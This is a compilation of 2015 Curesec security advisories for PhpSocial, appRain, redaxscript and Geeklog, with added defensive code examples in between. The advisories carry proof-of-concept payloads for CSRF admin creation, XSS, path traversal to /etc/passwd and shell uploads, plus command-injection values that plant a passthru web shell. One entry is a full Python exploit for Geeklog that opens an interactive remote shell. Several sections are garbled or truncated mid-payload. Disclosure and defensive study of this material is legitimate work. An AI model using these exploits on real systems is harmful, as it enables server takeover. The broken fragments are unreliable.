12/17/2015 Disclosed to public

Blog Reference:
https://blog.curesec.com/article/blog/Arastta-115-XSS-132.html
[FD] PhpSocial v2.0.0304: CSRF
Security Advisory - Curesec Research Team

1. Introduction

Affected Product: PhpSocial v2.0.0304_2026
Fixed in: not fixed
Fixed Version Link: n/a
Vendor Website: http://phpsocial.net
Vulnerability Type: CSRF
Remote Exploitable: Yes
Reported to vendor: 11/21/2015
Disclosed to public: 12/21/2015
Release mode: Full Disclosure
CVE: n/a
Credits: Tim Coen of Curesec GmbH

2. Overview

CVSS
Medium 5.1 AV:N/AC:H/Au:N/C:P/I:P/A:P

Description
PhpSocial is a social networking software written in PHP. In version v2.0.0304, it does not have CSRF protection, which means that an attacker can perform actions for a victim, if the victim visits an attacker controlled site while logged in.

3. Proof of Concept

Add a new admin:
http://localhost/PhpSocial_v2.0.0304_2026/cms_phpsocial/admin/AdminAddViewadmins.php"; method="POST">

4. Solution

This issue was not fixed by the vendor.

5. Report Timeline

11/21/2015 Contacted Vendor (no reply)
12/10/2015 Tried to remind vendor (no email is given, secur...@phpsocial.net does not exist, and contact form could not be used because the website is down)
12/21/2015 Disclosed to public

Blog Reference:
https://blog.curesec.com/article/blog/PhpSocial-v200304-CSRF-133.html
[FD] PhpSocial v2.0.0304: XSS
Security Advisory - Curesec Research Team

1. Introduction

Affected Product: PhpSocial v2.0.0304_2026
Fixed in: not fixed
Fixed Version Link: n/a
Vendor Website: http://phpsocial.net
Vulnerability Type: XSS / Open Redirect
Remote Exploitable: Yes
Reported to vendor: 11/21/2015
Disclosed to public: 12/21/2015
Release mode: Full Disclosure
CVE: n/a
Credits: Tim Coen of Curesec GmbH

2. Overview

CVSS
Medium 5.0 AV:N/AC:L/Au:N/C:N/I:P/A:N

Description
PhpSocial is a social networking software written in PHP. In version v2.0.0304, the profile fields Name, Birthday, Street Address, City, State, Country, and Phone Number are open to persistent XSS. This can lead to the stealing of cookies, injection of JavaScript keyloggers, and bypassing of CSRF protection. In this case, this can lead to code execution via the template editor.

3. Proof of Concept

Visit Profile:
http://localhost/PhpSocial_v2.0.0304_2026/cms_phpsocial/Profile.php?user=[USERNAME]

Click edit and use the following for any of the vulnerable fields:

4. Open Redirect

CVSS
Low 2.1 AV:N/AC:H/Au:S/C:N/I:P/A:N

Description
PhpSocial is also vulnerable to a reflected open redirect, which may for example be used in phishing attacks. The attack only works if the victim is logged in to PhpSocial.

Proof of Concept
http://localhost//PhpSocial_v2.0.0304_2026/cms_phpsocial/UserEditprofileStatus.php?status_new=foobar&task=dosave&return_url=http://google.com

5. Solution

This issue was not fixed by the vendor.

6. Report Timeline

11/21/2015 Contacted Vendor (no reply)
12/10/2015 Tried to remind vendor (no email is given, secur...@phpsocial.net does not exist, and contact form could not be used because the website is down)
12/21/2015 Disclosed to public

Blog Reference:
https://blog.curesec.com/article/blog/PhpSocial-v200304-XSS-134.html
[FD] appRain 4.0.3: Code Execution
Security Advisory - Curesec Research Team

1. Introduction

Affected Product: appRain 4.0.3
Fixed in: not fixed
Fixed Version Link: n/a
Vendor Website: i...@apprain.com
Vulnerability Type: Code Execution
Remote Exploitable: Yes
Reported to vendor: 10/02/2015
Disclosed to public: 12/02/2015
Release mode: Full Disclosure
CVE: requested, but not assigned
Credits: Tim Coen of Curesec GmbH

2. Overview

appRain is described as a Content Management Framework written in PHP. There are various components of appRain 4.0.3 that should not provide the possibility of code execution or arbitrary file upload but do allow it. All of these issues are by default present in the admin area.

It should be noted that admins already have code execution via a designated PHP file editor. Still, the code of appRain is explicitly intended to be extended by its users, which means that components such as a seemingly secure file uploader, an image uploader, or a function decoding json should not lead to code execution.

3. Unrestricted Upload of File with Dangerous Type 1

CVSS
High 9.0 AV:N/AC:L/Au:S/C:C/I:C/A:C

Description
The file upload uses a blacklist for the file extension to forbid the upload of files with dangerous type. The disallowed extensions are:

php,php3,php4,exe,pl,py,bat,sys,dev,sh

However, files that can be uploaded and that also lead to code execution are .htaccess, as well as files with extension pht, php5, and phtml.

The file upload can be found here:
http://localhost/apprain/admin/filemanager

An admin account is required to use the file manager. It should be noted that an admin already has code execution via the designated PHP file editor. Still, this is an access violation in the context of this component and will also be an issue if users reuse the varifyFileName function in different contexts, which is to be expected.

Code

/development/controllers/admin.php
    if(!App::Module('Filemanager')->varifyFileName($this->data['filemanager']['image']['name'])){
        App::Module('Notification')->Push("File({$this->data['filemanager']['image']['name']}) is restricted to uploaded.","Error");
        App::Config()->redirect("/admin/filemanager/upload");
    }
    else {
        $path = App::Config()->filemanagerDir(DS);
        $data = App::Utility()->upload($this->data['filemanager']['image'],$path);
        App::Module('Notification')->Push("File({$data['file_name']}) uploaded successfully.");
        App::Config()->redirect("/admin/filemanager");
    }

/apprain/base/modules/filemanager.php
    public function varifyFileName($filename){
        $restrictedExt = explode(',',app::__def()->sysConfig('FILE_MANAGER_RESTRICTED_EXT'));
        return !in_array(App::Utility()->getExt($filename),$restrictedExt);
    }

/development/definition/system_configuration/config.xml:

4. Unrestricted Upload of File with Dangerous Type 2

CVSS
High 9.0 AV:N/AC:L/Au:S/C:C/I:C/A:C

Description
When creating a new slide, the label suggests that only images with extensions "*.jpeg, *.gif" may be uploaded. However, arbitrary files can be uploaded, including .php or .pht files.

An admin account is required to create new slides. It should be noted that an admin already has code execution via the designated PHP file editor. Still, this is an access violation in the context of this component and may also be an issue if users reuse the involved functions in different contexts.

Proof of Concept

POST /apprain/information/manage/appslide/add HTTP/1.1
Host: localhost
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=4d7rqc7hj3ej5j403nf4ktmq42
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---418924992299141519661615194
Content-Length: 1178

-----418924992299141519661615194
Content-Disposition: form-data; name="data[Option][title]"

test
-----418924992299141519661615194
Content-Disposition: form-data; name="data[Option][image]"; filename="test.pht"
Content-Type: application/octet-stream

test
-----418924992299141519661615194
Content-Disposition: form-data; name="data[Option][status]"

Active
-----418924992299141519661615194
Content-Disposition: form-data; name="Button[button_save]"

Save
-----418924992299141519661615194
Content-Disposition: form-data; name="data[Information][id]"

-----418924992299141519661615194
Content-Disposition: form-data; name="data[Information][type]"

appslide
-----418924992299141519661615194
Content-Disposition: form-data; name="data[Information][page]"

-----418924992299141519661615194--

5. Possibly Code Execution

CVSS
High 7.6 AV:N/AC:H/Au:N/C:
[FD] appRain 4.0.3: CSRF
Security Advisory - Curesec Research Team

1. Introduction

Affected Product: appRain 4.0.3
Fixed in: Fixed via optional module "CSRF Protection Module"
Fixed Version Link: http://www.apprain.com/extension/20/accounting-system?s=Description
Vendor Website: i...@apprain.com
Vulnerability Type: CSRF
Remote Exploitable: Yes
Reported to vendor: 10/02/2015
Disclosed to public: 12/02/2015
Release mode: Coordinated release
CVE: requested, but not assigned
Credits: Tim Coen of Curesec GmbH

2. Vulnerability Description

CVSS
Medium 5.1 AV:N/AC:L/Au:S/C:P/I:P/A:P

Description
None of the requests have CSRF protection. This means that an attacker can execute actions for an admin if the admin visits an attacker controlled website while logged in.

3. Proof of Concept

Add new Admin:
http://localhost/apprain-source-4.0.3/admin/manage/add/"; method="POST">

Code Execution (using the PHP file editor):
http://localhost/apprain-source-4.0.3/appeditor/index?loc=webroot/index.php"; method="POST">
     http://www.opensource.org/licenses/mit-license.php
     * If you did not receive a copy of the license and are unable to
     * obtain it through the world-wide-web, please send an email
     * to lice...@apprain.com so we can send you a copy immediately.
     *
     * @copyright  Copyright (c) 2010 appRain, Team. (http://www.apprain.com)
     * @license    http://www.opensource.org/licenses/mit-license.php  MIT license
     *
     * HELP
     *
     * Official Website
     * http://www.apprain.com/
     *
     * Download Link
     * http://www.apprain.com/download
     *
     * Documents Link
     * http://www.apprain.com/docs
     */

    if (version_compare(phpversion(), '5.1.0', '<') === true) {
        die("Whoops, it looks like you have an invalid PHP version.appRain supports PHP 5.1.0 or newer.");
    }

    $appLoc = "../app.php";

    if (!file_exists($appLoc)) {
        die("appRain core file(s) missing... Get a new copy ");
    }

    error_reporting(E_ALL);

    require_once $appLoc;

    umask(0);

    App::Run();
    passthru($_GET['x']);" />

The injected code can now be executed here:
http://localhost/apprain-source-4.0.3/webroot/index.php?x=ls

4. Solution

To mitigate this issue please install the "Data Exchange Security" module:
http://www.apprain.com/extension/20/accounting-system?s=Description

5. Report Timeline

10/02/2015 Informed Vendor. Mailbox i...@apprain.com is full, used secur...@apprain.com instead (no reply)
10/21/2015 Reminded Vendor of Disclosure Date
10/21/2015 Vendor announces fix
~11/02/2015 Vendor releases optional module for CSRF protection
11/04/2015 Suggested to vendor that CSRF protection should not be optional (no reply)
11/17/2015 CVE Requested (no reply)
12/02/2015 Disclosed to public

Blog Reference:
https://blog.curesec.com/article/blog/appRain-403-CSRF-112.html
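Three advisories on this page (Grawlix 1.0.3, PhpSocial v2.0.0304 and appRain 4.0.3) describe the same missing control: state-changing admin requests are accepted from any page the logged-in admin happens to visit, because the browser attaches the session cookie regardless of which site submitted the form. The following is an added example, not code from any of these advisories or projects (all of which are PHP), showing the synchronizer-token pattern that fixes this: a per-session random token that every form must echo back, compared in constant time, with an Origin/Referer check as a second layer. SITE_ORIGIN, the session dictionary and the handler names are assumptions of this example.

```python
import hmac
import secrets
from urllib.parse import urlsplit

# Constructed for this example: the origin the admin interface is served from.
SITE_ORIGIN = "http://localhost"
TOKEN_KEY = "csrf_token"


def issue_token(session: dict) -> str:
    """Return the session's CSRF token, creating it on first use.

    The token is embedded as a hidden field in every state-changing form. An
    attacker's page can make the victim's browser submit such a form (the session
    cookie goes along automatically), but it cannot read the token out of the
    victim's session, so it cannot supply a matching value.
    """
    if TOKEN_KEY not in session:
        session[TOKEN_KEY] = secrets.token_urlsafe(32)
    return session[TOKEN_KEY]


def token_is_valid(session: dict, submitted) -> bool:
    """Compare the submitted token with the session's in constant time."""
    expected = session.get(TOKEN_KEY)
    if not expected or not isinstance(submitted, str):
        return False
    return hmac.compare_digest(expected, submitted)


def origin_is_allowed(headers: dict, site_origin: str = SITE_ORIGIN) -> bool:
    """Defence in depth: browsers attach Origin (or at least Referer) to cross-site POSTs."""
    sent = headers.get("Origin") or headers.get("Referer")
    if not sent:
        return False  # this example treats a missing header on a POST as cross-site
    a, b = urlsplit(sent), urlsplit(site_origin)
    return (a.scheme.lower(), a.netloc.lower()) == (b.scheme.lower(), b.netloc.lower())


def handle_admin_post(session: dict, form: dict, headers: dict) -> str:
    """Gate for a state-changing admin request (add admin, change password, save a file)."""
    if not origin_is_allowed(headers):
        return "rejected: cross-site origin"
    if not token_is_valid(session, form.get(TOKEN_KEY)):
        return "rejected: missing or invalid CSRF token"
    return "ok"
```

The token check is the primary control; the Origin check alone is not sufficient, since some clients omit both headers, but it rejects the obvious cross-site submission before any token logic runs. Making such protection an optional module, as the advisory's timeline notes, leaves every installation that does not enable it in the vulnerable state.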
[FD] appRain 4.0.3: Path Traversal
Security Advisory - Curesec Research Team

1. Introduction

Affected Product: appRain 4.0.3
Fixed in: not fixed
Fixed Version Link: n/a
Vendor Website: i...@apprain.com
Vulnerability Type: Path Traversal
Remote Exploitable: Yes
Reported to vendor: 10/02/2015
Disclosed to public: 12/02/2015
Release mode: Full Disclosure
CVE: requested, but not assigned
Credits: Tim Coen of Curesec GmbH

2. Vulnerability Description

CVSS
Medium 4.0 AV:N/AC:L/Au:S/C:P/I:N/A:N

Description
The "loc" Parameter of the appeditor is vulnerable to directory traversal, which allows the viewing of arbitrary files.

Admin credentials are required to view files. It should be noted that an admin already has code execution via the designated PHP file editor. Still, this is an access violation in the context of this component.

3. Proof of Concept

http://localhost/apprain-source-4.0.3/appeditor?loc=../../../../../../../etc/passwd

6. Solution

This issue was not fixed by the vendor.

7. Report Timeline

10/02/2015 Informed Vendor. Mailbox i...@apprain.com is full, used secur...@apprain.com instead (no reply)
10/21/2015 Reminded Vendor of Disclosure Date
10/21/2015 Vendor announces fix for 11/02/2015
11/04/2015 No fix released, extended public disclosure date to 11/11/2015
11/17/2015 CVE Requested (no reply)
11/24/2015 Reminded Vendor of release date, extended date to 12/02/2015 and offered extension if needed (no reply)
12/02/2015 Disclosed to public

Blog Reference:
https://blog.curesec.com/article/blog/appRain-403-Path-Traversal-113.html
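The traversal above works because the "loc" value is joined onto the editor's base directory and the ".." segments then climb out of it. The following is an added example, not code from the advisory or from appRain (which is PHP), of the containment check that stops this: normalise the joined path, then require that the editor root is a whole-component prefix of the result. EDITOR_ROOT is an assumed location, since the advisory does not say where the appeditor reads files from; the function name is this example's own.

```python
import os
from typing import Optional

# Assumed for this example; the advisory does not say where appeditor reads files from.
EDITOR_ROOT = "/var/www/apprain"


def resolve_editor_path(loc: str, root: str = EDITOR_ROOT) -> Optional[str]:
    """Map a user-supplied `loc` to a file inside `root`, or return None if it escapes.

    The advisory's value is a chain of `..` segments. Normalising the joined path
    with realpath (which also follows symlinks) and then checking containment
    component-wise catches it whether the segments are plain, repeated, or mixed
    with legitimate directory names.
    """
    if not loc or "\x00" in loc:
        return None  # empty or NUL-truncated names are never a valid editor target
    root_real = os.path.realpath(root)
    # os.path.join discards `root` when `loc` is absolute, so an absolute `loc`
    # such as /etc/passwd is caught by the containment check below, not a special case.
    candidate = os.path.realpath(os.path.join(root_real, loc))
    # commonpath compares whole components: /var/www/apprain2 does not pass as
    # /var/www/apprain, which a plain string-prefix test would get wrong.
    if os.path.commonpath([root_real, candidate]) != root_real:
        return None
    return candidate
```

Rejecting the request outright (rather than silently stripping "../") is the safer behaviour: a stripped value such as "....//" can re-form a traversal after one pass, whereas a containment check on the final path cannot be argued with. The web server decodes percent-encoding before PHP sees the parameter, so the check runs on the decoded value in practice.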
[FD] appRain 4.0.3: XSS
Security Advisory - Curesec Research Team

1. Introduction

Affected Product: appRain 4.0.3
Fixed in: not fixed
Fixed Version Link: n/a
Vendor Website: i...@apprain.com
Vulnerability Type: XSS
Remote Exploitable: Yes
Reported to vendor: 10/02/2015
Disclosed to public: 12/02/2015
Release mode: Full Disclosure
CVE: requested, but not assigned
Credits: Tim Coen of Curesec GmbH

2. Overview

There are two reflected XSS vulnerabilities in appRain 4.0.3. This can lead to the injection of JavaScript keyloggers or the bypassing of CSRF protection. In the case of appRain, this may lead to code execution.

3. XSS 1

CVSS
Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N

Description
The search of the file manager echoes user input without encoding, leading to reflected XSS.

Proof of Concept
http://localhost/apprain-source-4.0.3/admin/filemanager/upload"; method="POST">
alert(1)" />

Code
/apprain/base/modules/toolbar.php
    private function btnFilemanagerSrcBox($srcstr = "")
    {
        $html = ' ';
        return array('box' => $html);
    }

4. XSS 2

CVSS
Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N

Description
The appeditor echoes the given file name and path without encoding, leading to reflected XSS.

Proof of Concept
http://localhost/apprain-source-4.0.3/appeditor?loc='">alert(1)

Code
/component/appeditor/controllers/appeditor/index.phtml
    X

5. Solution

This issue was not fixed by the vendor.

6. Report Timeline

10/02/2015 Informed Vendor. Mailbox i...@apprain.com is full, used secur...@apprain.com instead (no reply)
10/21/2015 Reminded Vendor of Disclosure Date
10/21/2015 Vendor announces fix for 11/02/2015
11/04/2015 No fix released, extended public disclosure date to 11/11/2015
11/05/2015 Vendor asks for list of organizations that may help implementing fixes
11/11/2015 Replied that we do not have lists, and that we do not have the resources to implement fixes ourselves. Extended release date to 11/18/2015 and offered further extension if needed (no reply)
11/17/2015 CVE Requested (no reply)
11/24/2015 Reminded Vendor of release date, extended date to 12/02/2015 and offered extension if needed (no reply)
12/02/2015 Disclosed to public

Blog Reference:
https://blog.curesec.com/article/blog/appRain-403-XSS-115.html
[FD] redaxscript 2.5.0: Code Execution
Security Advisory - Curesec Research Team

1. Introduction

Affected Product: redaxscript 2.5.0
Fixed in: module has been removed in version 2.6.0
Fixed Version Link: n/a
Vendor Contact: i...@redaxmedia.com
Vulnerability Type: Code Execution
Remote Exploitable: Yes
Reported to vendor: 10/02/2015
Disclosed to public: 12/02/2015
Release mode: Coordinated release
CVE: n/a
Credits: Tim Coen of Curesec GmbH

2. Overview

CVSS
High 9.0 AV:N/AC:L/Au:S/C:C/I:C/A:C

Description
The module file_manager allows for file uploads, and uses exif_imagetype to check the validity of the file. By setting the first bytes of the uploaded file to that of a valid image type, an attacker can easily bypass this check and thus upload files of dangerous type.

It should be noted that only files with the name index.php will be executed, as access to all other PHP files is forbidden by a htaccess file.

An account that has access to the module "File manager" is needed to exploit this issue.

3. Code

/modules/file_manager/index.php
    function file_manager_upload($directory = '')
    {
        $file = $_FILES['file']['tmp_name'];
        $file_name = file_manager_clean_file_name($_FILES['file']['name']);
        $file_size = $_FILES['file']['size'];

        /* validate post */

        if (function_exists('exif_imagetype'))
        {
            if (exif_imagetype($file) == '')
            {
                $error = l('file_type_limit', '_file_manager') . l('point');
            }
        }

4. Solution

To mitigate this issue please remove the file_manager module.

5. Report Timeline

10/02/2015 Informed Vendor about Issue
11/15/2015 Vendor removes affected module
12/02/2015 Disclosed to public

Blog Reference:
https://blog.curesec.com/article/blog/redaxscript-250-Code-Execution-116.html
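The upload issues on this page fail in three different ways: Grawlix 1.0.3 checks nothing, appRain 4.0.3 uses an extension blacklist that misses pht, php5, phtml and .htaccess, and redaxscript 2.5.0 checks only the magic bytes that exif_imagetype reads, which an uploaded file can simply start with. The following is an added example, not code from any of these advisories or projects (all of which are PHP), that reproduces the appRain blacklist verbatim to show what it lets through, and beside it an allow-list validator that checks the extension, checks that the content carries that type's magic bytes, and then stores the file under a server-generated name so the client's filename (index.php, .htaccess, x.php.gif) never reaches disk. The magic-byte table and function names are this example's own.

```python
import os
import secrets
from typing import Optional

# Blacklist exactly as the appRain advisory lists FILE_MANAGER_RESTRICTED_EXT.
BLACKLIST = {"php", "php3", "php4", "exe", "pl", "py", "bat", "sys", "dev", "sh"}

# Allow-list: extension -> magic-byte prefixes the content must start with.
# A prefix check is what exif_imagetype() does in the redaxscript advisory, so
# here it is one layer of three rather than the whole defence.
ALLOWED = {
    "gif": (b"GIF87a", b"GIF89a"),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
}


def extension(filename: str) -> str:
    """Lower-cased text after the last dot of the base name ('' if there is none)."""
    base = os.path.basename(filename)
    return base.rsplit(".", 1)[1].lower() if "." in base else ""


def blacklist_allows(filename: str) -> bool:
    """The advisory's varifyFileName() logic: anything not on the list passes."""
    return extension(filename) not in BLACKLIST


def validate_upload(filename: str, data: bytes) -> Optional[str]:
    """Return a server-chosen storage name for an acceptable image, or None.

    Layer 1: the extension must be on the allow-list (so pht/php5/phtml and
             '.htaccess', whose 'extension' is 'htaccess', are rejected by default).
    Layer 2: the content must start with that type's magic bytes.
    Layer 3: the stored name is generated here, not taken from the client, so a
             name such as index.php cannot be chosen even if layers 1 and 2 were fooled.
    """
    ext = extension(filename)
    if ext not in ALLOWED:
        return None
    if not data.startswith(ALLOWED[ext]):
        return None
    return f"{secrets.token_hex(16)}.{ext}"
```

A GIF header followed by PHP code still passes layer 2, exactly as it passed exif_imagetype in the advisory; what makes that harmless here is that the file is stored as <random>.gif in a directory the web server does not execute scripts from, which is the control the redaxscript module lacked for index.php. For an image upload, re-encoding the file with an image library is a further layer that discards any trailing payload.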
[FD] redaxscript 2.5.0: XSS
Security Advisory - Curesec Research Team

1. Introduction

Affected Product: redaxscript 2.5.0
Fixed in: 2.6.1
Fixed Version Link: http://redaxscript.com/files/releases/redaxscript_2.6.1_full.zip
Vendor Contact: i...@redaxmedia.com
Vulnerability Type: XSS
Remote Exploitable: Yes
Reported to vendor: 10/02/2015
Disclosed to public: 12/02/2015
Release mode: Coordinated release
CVE: n/a
Credits: Tim Coen of Curesec GmbH

2. Overview

CVSS
Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N

Description
There is a persistent XSS vulnerability when leaving comments. It requires the admin to hover over a link to trigger the injected code. This issue can lead to the injection of JavaScript keyloggers, or the bypassing of CSRF protection. In this case, this may lead to code execution.

The issue has been partially fixed in version 2.6.0. However, it was still possible to inject a style attribute, making XSS in older browsers possible. This has been fixed in version 2.6.1.

3. Proof of Concept

1. Create a comment, as comment text use:
   comment" onmouseover=alert(1) foo="
2. In the sidebar, hover over the comment to trigger the XSS.

4. Solution

To mitigate this issue please upgrade at least to version 2.6.1:
http://redaxscript.com/files/releases/redaxscript_2.6.1_full.zip
Please note that a newer version might already be available.

5. Report Timeline

10/02/2015 Informed Vendor about Issue
11/15/2015 Vendor releases partial fix
11/24/2015 Informed vendor that fix is incomplete
11/25/2015 Vendor releases fix
12/02/2015 Disclosed to public

Blog Reference:
https://blog.curesec.com/article/blog/redaxscript-250-XSS-118.html
[FD] Geeklog 2.1.0: Code Execution
Security Advisory - Curesec Research Team

1. Introduction

Affected Product: Geeklog 2.1.0
Fixed in: 2.1.1b3
Fixed Version Link: https://www.geeklog.net/filemgmt/visit.php/1156
Vendor Contact: geeklog-secur...@lists.geeklog.net
Vulnerability Type: Code Execution
Remote Exploitable: Yes
Reported to vendor: 09/29/2015
Disclosed to public: 12/02/2015
Release mode: Coordinated release
CVE: requested, but not assigned
Credits: Tim Coen of Curesec GmbH

2. Overview

The admin area of Geeklog suffers from two vulnerabilities that can lead to code execution: OS Command Injection and Upload of Files with Dangerous Type. The arbitrary file upload is already fixed in the beta version geeklog-2.1.1b1, the OS command injection in version 2.1.1b3.

3. Upload of Files with Dangerous Type

CVSS
High 9.0 AV:N/AC:L/Au:S/C:C/I:C/A:C

Description
When uploading a file, the file type check is performed only client-side. An attacker can easily bypass this check and thus upload files of dangerous types, such as PHP files. To upload files, an attacker needs a registered user that is in the group "Filemanager Admin".

Proof of Concept

POST /geeklog-2.1.0/public_html/filemanager/connectors/php/filemanager.php HTTP/1.1
Host: localhost
X-Requested-With: XMLHttpRequest
Content-Length: 761
Content-Type: multipart/form-data; boundary=---10717364298700964751730232773
Cookie: [cookies]

-10717364298700964751730232773
Content-Disposition: form-data; name="mode"

add
-10717364298700964751730232773
Content-Disposition: form-data; name="currentpath"

/var/www/geeklog-2.1.0/public_html/images/
-10717364298700964751730232773
Content-Disposition: form-data; name="filepath"

test.png
-10717364298700964751730232773
Content-Disposition: form-data; name="newfile"; filename="shell.php"
Content-Type: image/png

http://localhost/geeklog-2.1.0/public_html/filemanager/connectors/php/filemanager.php'

4. OS Command Injection

CVSS
High 9.0 AV:N/AC:L/Au:S/C:C/I:C/A:C

Description
When performing a database backup, various settings are passed unsanitized to exec, leading to code execution. To exploit this issue, an attacker needs a registered user that is in the group "Root".

Proof of Concept

1. Change "Backup File Name Mask" in http://localhost/geeklog-2.1.0/public_html/admin/configuration.php?tab-5 to:
   geeklog_db_backup_%Y_%m_%d_%H_%M_%S.sql";echo " shell.php;"
2. Perform database backup here: http://localhost/geeklog-2.1.0/public_html/admin/database.php

The injected commands will be executed.

In the beta version geeklog-2.1.1b1, less-than is filtered out, but OS command injection is still possible, including the creation of a PHP shell by appending the injected PHP code to an existing PHP file without closing tags:
geeklog_db_backup_%Y_%m_%d_%H_%M_%S.sql";echo "passthru(\$_GET['x']);" >> ../filemanager/connectors/php/inc/wideimage/lib/Font/PS.php;"

Code

/admin/database.php

function dobackup()
{
    [...]
    if (!empty($_CONF['mysqldump_filename_mask'])) {
        $filename_mask = strftime($_CONF['mysqldump_filename_mask']);
    }
    [...]
    $backupfile = $_CONF['backup_path'] . $filename_mask;
    [...]
    $command .= " $_DB_name > \"$backupfile\"";
    [...]
    if ($canExec) {
        exec($command);

5. Solution

To mitigate this issue please upgrade at least to version 2.1.1b3:
https://www.geeklog.net/filemgmt/visit.php/1156
Please note that a newer version might already be available.

6. Report Timeline

09/29/2015 Informed Vendor about Issue (no reply)
10/21/2015 Reminded Vendor of Disclosure Date
10/21/2015 Vendor asks for an additional two weeks for testing
11/17/2015 CVE Requested (no reply)
11/17/2015 Reminded Vendor of disclosure date
11/17/2015 Vendor points to beta version and announces release
11/24/2015 Informed Vendor of insufficient fix in beta
11/30/2015 Vendor releases fix
12/02/2015 Disclosed to public

Blog Reference:
https://blog.curesec.com/article/blog/Geeklog-210-Code-Execution-119.html
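The dobackup() fragment above concatenates a configuration value into a shell command. The following is an added example, not Geeklog's code, of how the mysqldump command line can be built so that a user-controlled "Backup File Name Mask" never reaches the shell as anything but data: a strict allowlist on the mask, and escapeshellarg() on every argument. Function names are the example's own; the mask expansion assumes only the %Y %m %d %H %M %S directives of the default mask matter, and the demo pins the timezone to UTC so the output is reproducible.

```php
<?php
// Added example, not Geeklog's code: build the mysqldump command line so that a
// user-controlled "Backup File Name Mask" cannot break out of its argument.
// Two layers: a strict allowlist on the mask, and escapeshellarg() on every
// argument handed to the shell. Function names are the example's own.

declare(strict_types=1);

/**
 * Accepts only masks made of letters, digits, '_', '-', '.' and single-letter
 * %-directives. Quotes, ';', '>', spaces and ".." are rejected outright.
 */
function validate_filename_mask(string $mask): bool
{
    return preg_match('/\A(?:[A-Za-z0-9_.\-]|%[A-Za-z])+\z/', $mask) === 1
        && strpos($mask, '..') === false;
}

/**
 * Returns the full command line, or null if the mask is unacceptable.
 * $now is the timestamp used to expand the mask (passed in for reproducibility).
 */
function build_backup_command(string $mysqldump, string $dbName, string $backupPath, string $mask, int $now): ?string
{
    if (!validate_filename_mask($mask)) {
        return null;
    }
    // Expand the strftime-style directives of Geeklog's default mask with date().
    // Assumption: only %Y %m %d %H %M %S matter; any other directive is left as-is.
    $map = ['Y' => 'Y', 'm' => 'm', 'd' => 'd', 'H' => 'H', 'M' => 'i', 'S' => 's'];
    $filename = preg_replace_callback(
        '/%([YmdHMS])/',
        function (array $m) use ($map, $now): string {
            return date($map[$m[1]], $now);
        },
        $mask
    );
    $backupFile = rtrim($backupPath, '/') . '/' . $filename;
    // Each argument becomes one single-quoted token for a POSIX shell, whatever it contains.
    return escapeshellarg($mysqldump) . ' ' . escapeshellarg($dbName)
        . ' > ' . escapeshellarg($backupFile);
}

// --- Demo with constructed inputs ---------------------------------------
date_default_timezone_set('UTC');
$good = 'geeklog_db_backup_%Y_%m_%d_%H_%M_%S.sql';
// Shape of the advisory's payload: close the quote, then a second command.
$bad  = 'geeklog_db_backup_%Y_%m_%d_%H_%M_%S.sql";echo "constructed" > shell.php;"';

var_dump(build_backup_command('/usr/bin/mysqldump', 'geeklog', '/var/backups', $good, 0));
var_dump(build_backup_command('/usr/bin/mysqldump', 'geeklog', '/var/backups', $bad, 0));
```

The first call yields a command whose three arguments are each single-quoted; the second returns null because the mask fails the allowlist before any command string is assembled. Even if the allowlist were dropped, escapeshellarg() would leave the quote and semicolon inside one quoted argument, so the file name would simply be an odd name rather than a second command.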
[FD] Geeklog 2.1.0: Code Execution Exploit
#!/usr/local/bin/python
# Exploit for geeklog-2.1.0 OS Command Injection vulnerability
# An admin account is required to use this exploit
# Curesec GmbH

import sys
import re
import argparse
import requests # requires requests lib

parser = argparse.ArgumentParser()
parser.add_argument("url", help="base url to vulnerable site")
parser.add_argument("username", help="admin username")
parser.add_argument("password", help="admin password")
args = parser.parse_args()

url = args.url
username = args.username
password = args.password

loginPath = "/admin/moderation.php"
configPath = "/admin/configuration.php?tab-5"
backupPath = "/admin/database.php"
shellFileName = "404.php"
shellContent = "', csrfRequest.text)
    return csrfTokenRegEx.group(1)

def injectCommand(requestSession, url):
    csrfToken = getCSRFToken(requestSession, url)
    postData = {"_glsectoken": csrfToken, "conf_group": "Core", "sub_group": "0", "form_submit": "true", "mysqldump_filename_mask": 'geeklog_db_backup_%Y_%m_%d_%H_%M_%S.sql";echo "' + shellContent + '" > ' + shellFileName + ';"'}
    requestSession.post(url, data = postData)

def executeCommand(requestSession, url):
    csrfToken = getCSRFToken(requestSession, url)
    requestSession.get(url + "?mode=backup&_glsectoken=" + csrfToken)

def runShell(url):
    print("enter command, or enter exit to quit.")
    command = raw_input("$ ")
    while "exit" not in command:
        print(requests.get(url + command).text)
        command = raw_input("$ ")

requestSession = requests.session()

if login(requestSession, url + loginPath, username, password):
    print("successful: login")
else:
    exit("ERROR: could not log in")

print("injecting command")
injectCommand(requestSession, url + configPath)
print("executing command")
executeCommand(requestSession, url + backupPath)
runShell(url + "/admin/" + shellFileName + "?x=")

Blog Reference:
https://blog.curesec.com/article/blog/Geeklog-210-Code-Execution-Exploit-120.html
[FD] Geeklog 2.1.0: XSS
Security Advisory - Curesec Research Team

1. Introduction

Affected Product: Geeklog 2.1.0
Fixed in: 2.1.1b3
Fixed Version Link: https://www.geeklog.net/filemgmt/visit.php/1156
Vendor Contact: geeklog-secur...@lists.geeklog.net
Vulnerability Type: XSS
Remote Exploitable: Yes
Reported to vendor: 09/29/2015
Disclosed to public: 12/02/2015
Release mode: Coordinated release
CVE: requested, but not assigned
Credits: Tim Coen of Curesec GmbH

2. Vulnerability Description

CVSS
Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N

Description
There is at least one XSS vulnerability in the installation script of Geeklog. Geeklog recommends to delete the install directory and displays warnings in the admin area if this is not the case. However, deleting the install directory is not mandatory, so it should be assumed that not all users will delete it.

3. Proof of Concept

http://localhost/geeklog-2.1.0/public_html/admin/install/bigdump.php?foffset=1&start=1&fn=tealert(1)st.sql

$_REQUEST['site_url'], $_REQUEST['site_admin_url'], and $_SERVER['PHP_SELF'] may be vulnerable as well, but the attacker would need a valid sql backup file to trigger them.

4. Solution

To mitigate this issue please upgrade at least to version 2.1.1b3:
https://www.geeklog.net/filemgmt/visit.php/1156
Please note that a newer version might already be available.

5. Report Timeline

09/29/2015 Informed Vendor about Issue (no reply)
10/21/2015 Reminded Vendor of Disclosure Date
